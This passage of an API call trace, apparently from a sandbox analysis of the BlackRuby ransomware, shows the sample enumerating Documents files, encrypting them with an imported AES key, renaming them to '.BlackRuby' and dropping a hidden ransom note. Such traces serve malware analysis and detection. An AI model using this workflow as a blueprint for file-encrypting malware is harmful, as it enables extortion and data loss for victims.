(lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.288] GetLastError () returned 0x5 [0058.289] SetErrorMode (uMode=0x0) returned 0x1 [0058.289] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA", lpFilePart=0x0) returned 0x28 [0058.289] GetLastError () returned 0x5 [0058.289] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.289] GetLastError () returned 0x5 [0058.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.289] GetLastError () returned 0x5 [0058.289] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA", lpFilePart=0x0) returned 0x28 [0058.290] GetLastError () returned 0x5 [0058.290] SetErrorMode (uMode=0x1) returned 0x0 [0058.290] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0058.290] GetLastError () returned 0x5 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x5 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x5 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x5 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x5 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.290] GetLastError () returned 0x12 [0058.290] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0058.290] SetErrorMode (uMode=0x0) returned 0x1 [0058.290] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA", lpFilePart=0x0) returned 0x28 [0058.290] GetLastError () returned 0x12 [0058.290] SetErrorMode (uMode=0x1) returned 0x0 [0058.290] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0058.290] GetLastError () returned 0x12 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x12 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x12 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x12 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.290] GetLastError () returned 0x12 [0058.290] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.290] GetLastError () returned 0x12 [0058.291] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0058.291] SetErrorMode (uMode=0x0) returned 0x1 [0058.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", lpFilePart=0x0) returned 0x3c [0058.291] GetLastError () returned 0x12 [0058.291] SetErrorMode (uMode=0x1) returned 0x0 [0058.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ji_qz0rqbyidnou.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1bd00d8 | out: lpFileInformation=0x1bd00d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd530ee0, ftCreationTime.dwHighDateTime=0x1d34bdd, ftLastAccessTime.dwLowDateTime=0xc560e4a0, ftLastAccessTime.dwHighDateTime=0x1d34f17, ftLastWriteTime.dwLowDateTime=0xc560e4a0, ftLastWriteTime.dwHighDateTime=0x1d34f17, nFileSizeHigh=0x0, nFileSizeLow=0x3028)) returned 1 [0058.291] GetLastError () returned 0x12 [0058.291] SetErrorMode (uMode=0x0) returned 0x1 [0058.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", lpFilePart=0x0) returned 0x3c [0058.291] GetLastError () returned 0x12 [0058.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", lpFilePart=0x0) returned 0x3c [0058.291] GetLastError () returned 0x12 [0058.291] SetErrorMode (uMode=0x1) returned 0x0 [0058.291] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ji_qz0rqbyidnou.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.291] GetLastError () returned 0x0 [0058.291] GetFileType (hFile=0x184) returned 0x1 [0058.291] SetErrorMode (uMode=0x0) returned 0x1 [0058.291] GetFileType (hFile=0x184) returned 0x1 [0058.291] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x3028 [0058.291] GetLastError () returned 0x0 [0058.291] ReadFile (in: hFile=0x184, lpBuffer=0x1bd1c5c, nNumberOfBytesToRead=0x3028, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bd1c5c*, lpNumberOfBytesRead=0x18ed18*=0x3028, lpOverlapped=0x0) returned 1 [0058.292] GetLastError () returned 0x0 [0058.292] CloseHandle (hObject=0x184) returned 1 [0058.292] GetLastError () returned 0x0 [0058.292] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", lpFilePart=0x0) returned 0x3c [0058.292] GetLastError () returned 0x0 [0058.292] SetErrorMode (uMode=0x1) returned 0x0 [0058.292] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ji_qz0rqbyidnou.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd530ee0, ftCreationTime.dwHighDateTime=0x1d34bdd, ftLastAccessTime.dwLowDateTime=0xc560e4a0, ftLastAccessTime.dwHighDateTime=0x1d34f17, ftLastWriteTime.dwLowDateTime=0xc560e4a0, ftLastWriteTime.dwHighDateTime=0x1d34f17, nFileSizeHigh=0x0, nFileSizeLow=0x3028)) returned 1 [0058.292] GetLastError () returned 0x0 [0058.292] SetErrorMode (uMode=0x0) returned 0x1 [0058.292] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c818) returned 1 [0058.293] GetLastError () returned 0x0 [0058.332] CryptImportKey (in: hProv=0x37c818, pbData=0x1c32088, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360aa0) returned 1 [0058.332] GetLastError () returned 0x0 [0058.332] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.332] GetLastError () returned 0x0 [0058.337] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.337] GetLastError () returned 0x0 [0058.337] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ee0) returned 1 [0058.337] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.338] GetLastError () returned 0x0 [0058.338] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1c5f0d4*=0x1, dwFlags=0x0) returned 1 [0058.338] GetLastError () returned 0x0 [0058.338] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1c5f0a0, dwFlags=0x0) returned 1 [0058.338] GetLastError () returned 0x0 [0058.338] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c5f11c*, pdwDataLen=0x18ed08*=0x3120, dwBufLen=0x3120 | out: pbData=0x1c5f11c*, pdwDataLen=0x18ed08*=0x3120) returned 1 [0058.338] GetLastError () returned 0x0 [0058.338] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c65388*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c65388*, pdwDataLen=0x18ed20*=0x10) returned 1 [0058.338] GetLastError () returned 0x0 [0058.338] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c653b8*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c653b8*, pdwDataLen=0x18ed28*=0x10) returned 1 [0058.338] GetLastError () returned 0x0 [0058.338] CryptDestroyKey (hKey=0x360aa0) returned 1 [0058.338] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.338] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.338] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", lpFilePart=0x0) returned 0x3c [0058.338] GetLastError () returned 0x0 [0058.338] SetErrorMode (uMode=0x1) returned 0x0 [0058.338] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ji_qz0rqbyidnou.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.339] GetLastError () returned 0xb7 [0058.339] GetFileType (hFile=0x184) returned 0x1 [0058.339] SetErrorMode (uMode=0x0) returned 0x1 [0058.339] GetFileType (hFile=0x184) returned 0x1 [0058.340] CloseHandle (hObject=0x184) returned 1 [0058.340] GetLastError () returned 0xb7 [0058.340] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt", lpFilePart=0x0) returned 0x3c [0058.340] GetLastError () returned 0xb7 [0058.340] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Encrypted_L1AMCbC3rGipMqYyKnvZzashBXqXrDMkzJJkt.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Encrypted_L1AMCbC3rGipMqYyKnvZzashBXqXrDMkzJJkt.BlackRuby", lpFilePart=0x0) returned 0x62 [0058.340] GetLastError () returned 0xb7 [0058.340] SetErrorMode (uMode=0x1) returned 0x0 [0058.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ji_qz0rqbyidnou.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd530ee0, ftCreationTime.dwHighDateTime=0x1d34bdd, ftLastAccessTime.dwLowDateTime=0xc560e4a0, ftLastAccessTime.dwHighDateTime=0x1d34f17, ftLastWriteTime.dwLowDateTime=0x2af76680, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x3130)) returned 1 [0058.340] GetLastError () returned 0xb7 [0058.341] SetErrorMode (uMode=0x0) returned 0x1 [0058.341] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Ji_qz0rqbYidnoU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ji_qz0rqbyidnou.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Encrypted_L1AMCbC3rGipMqYyKnvZzashBXqXrDMkzJJkt.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\encrypted_l1amcbc3rgipmqyyknvzzashbxqxrdmkzjjkt.blackruby")) returned 1 [0058.341] GetLastError () returned 0xb7 [0058.341] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0058.341] GetLastError () returned 0xb7 [0058.341] SetErrorMode (uMode=0x1) returned 0x0 [0058.341] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.342] GetLastError () returned 0x0 [0058.342] GetFileType (hFile=0x184) returned 0x1 [0058.342] SetErrorMode (uMode=0x0) returned 0x1 [0058.342] GetFileType (hFile=0x184) returned 0x1 [0058.342] CloseHandle (hObject=0x184) returned 1 [0058.343] GetLastError () returned 0x0 [0058.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0058.343] GetLastError () returned 0x0 [0058.343] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0058.343] GetLastError () returned 0x0 [0058.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", lpFilePart=0x0) returned 0x37 [0058.343] GetLastError () returned 0x0 [0058.343] SetErrorMode (uMode=0x1) returned 0x0 [0058.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ymzleea6i.docx"), fInfoLevelId=0x0, lpFileInformation=0x1c8b5dc | out: lpFileInformation=0x1c8b5dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3832d10, ftCreationTime.dwHighDateTime=0x1d34d7a, ftLastAccessTime.dwLowDateTime=0xdc183230, ftLastAccessTime.dwHighDateTime=0x1d34e80, ftLastWriteTime.dwLowDateTime=0xdc183230, ftLastWriteTime.dwHighDateTime=0x1d34e80, nFileSizeHigh=0x0, nFileSizeLow=0x10002)) returned 1 [0058.343] GetLastError () returned 0x0 [0058.343] SetErrorMode (uMode=0x0) returned 0x1 [0058.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", lpFilePart=0x0) returned 0x37 [0058.343] GetLastError () returned 0x0 [0058.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", lpFilePart=0x0) returned 0x37 [0058.343] GetLastError () returned 0x0 [0058.343] SetErrorMode (uMode=0x1) returned 0x0 [0058.343] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ymzleea6i.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.343] GetLastError () returned 0x0 [0058.343] GetFileType (hFile=0x184) returned 0x1 [0058.343] SetErrorMode (uMode=0x0) returned 0x1 [0058.344] GetFileType (hFile=0x184) returned 0x1 [0058.344] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x10002 [0058.344] GetLastError () returned 0x0 [0058.344] ReadFile (in: hFile=0x184, lpBuffer=0x1c8d11c, nNumberOfBytesToRead=0x10002, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c8d11c*, lpNumberOfBytesRead=0x18ed18*=0x10002, lpOverlapped=0x0) returned 1 [0058.345] GetLastError () returned 0x0 [0058.345] CloseHandle (hObject=0x184) returned 1 [0058.345] GetLastError () returned 0x0 [0058.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", lpFilePart=0x0) returned 0x37 [0058.345] GetLastError () returned 0x0 [0058.345] SetErrorMode (uMode=0x1) returned 0x0 [0058.345] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ymzleea6i.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3832d10, ftCreationTime.dwHighDateTime=0x1d34d7a, ftLastAccessTime.dwLowDateTime=0xdc183230, ftLastAccessTime.dwHighDateTime=0x1d34e80, ftLastWriteTime.dwLowDateTime=0xdc183230, ftLastWriteTime.dwHighDateTime=0x1d34e80, nFileSizeHigh=0x0, nFileSizeLow=0x10002)) returned 1 [0058.345] GetLastError () returned 0x0 [0058.345] SetErrorMode (uMode=0x0) returned 0x1 [0058.356] CryptImportKey (in: hProv=0x37c680, pbData=0x1d074e4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f20) returned 1 [0058.356] GetLastError () returned 0x0 [0058.356] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.356] GetLastError () returned 0x0 [0058.365] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.365] GetLastError () returned 0x0 [0058.365] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360c20) returned 1 [0058.365] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.365] GetLastError () returned 0x0 [0058.365] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1b450c8*=0x1, dwFlags=0x0) returned 1 [0058.365] GetLastError () returned 0x0 [0058.365] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1b45094, dwFlags=0x0) returned 1 [0058.365] GetLastError () returned 0x0 [0058.365] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b45110*, pdwDataLen=0x18ed08*=0x10100, dwBufLen=0x10100 | out: pbData=0x1b45110*, pdwDataLen=0x18ed08*=0x10100) returned 1 [0058.366] GetLastError () returned 0x0 [0058.366] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6533c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b6533c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0058.366] GetLastError () returned 0x0 [0058.366] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b6536c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b6536c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0058.366] GetLastError () returned 0x0 [0058.367] CryptDestroyKey (hKey=0x360f20) returned 1 [0058.367] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.367] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.367] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", lpFilePart=0x0) returned 0x37 [0058.367] GetLastError () returned 0x0 [0058.367] SetErrorMode (uMode=0x1) returned 0x0 [0058.367] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ymzleea6i.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.368] GetLastError () returned 0xb7 [0058.368] GetFileType (hFile=0x184) returned 0x1 [0058.368] SetErrorMode (uMode=0x0) returned 0x1 [0058.368] GetFileType (hFile=0x184) returned 0x1 [0058.368] WriteFile (in: hFile=0x184, lpBuffer=0x1b6539c*, nNumberOfBytesToWrite=0x10110, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1b6539c*, lpNumberOfBytesWritten=0x18ed24*=0x10110, lpOverlapped=0x0) returned 1 [0058.370] GetLastError () returned 0xb7 [0058.370] CloseHandle (hObject=0x184) returned 1 [0058.371] GetLastError () returned 0xb7 [0058.371] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx", lpFilePart=0x0) returned 0x37 [0058.371] GetLastError () returned 0xb7 [0058.371] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Encrypted_qAz8ODHip0cSI4HJr3jgHMwDm6LFuCTF9NJrF.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Encrypted_qAz8ODHip0cSI4HJr3jgHMwDm6LFuCTF9NJrF.BlackRuby", lpFilePart=0x0) returned 0x62 [0058.371] GetLastError () returned 0xb7 [0058.371] SetErrorMode (uMode=0x1) returned 0x0 [0058.371] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ymzleea6i.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3832d10, ftCreationTime.dwHighDateTime=0x1d34d7a, ftLastAccessTime.dwLowDateTime=0xdc183230, ftLastAccessTime.dwHighDateTime=0x1d34e80, ftLastWriteTime.dwLowDateTime=0x2afc2940, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10110)) returned 1 [0058.371] GetLastError () returned 0xb7 [0058.371] SetErrorMode (uMode=0x0) returned 0x1 [0058.371] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\yMzleeA6I.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\ymzleea6i.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\Encrypted_qAz8ODHip0cSI4HJr3jgHMwDm6LFuCTF9NJrF.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\encrypted_qaz8odhip0csi4hjr3jghmwdm6lfuctf9njrf.blackruby")) returned 1 [0058.372] GetLastError () returned 0xb7 [0058.372] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0058.372] GetLastError () returned 0xb7 [0058.372] SetErrorMode (uMode=0x1) returned 0x0 [0058.373] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 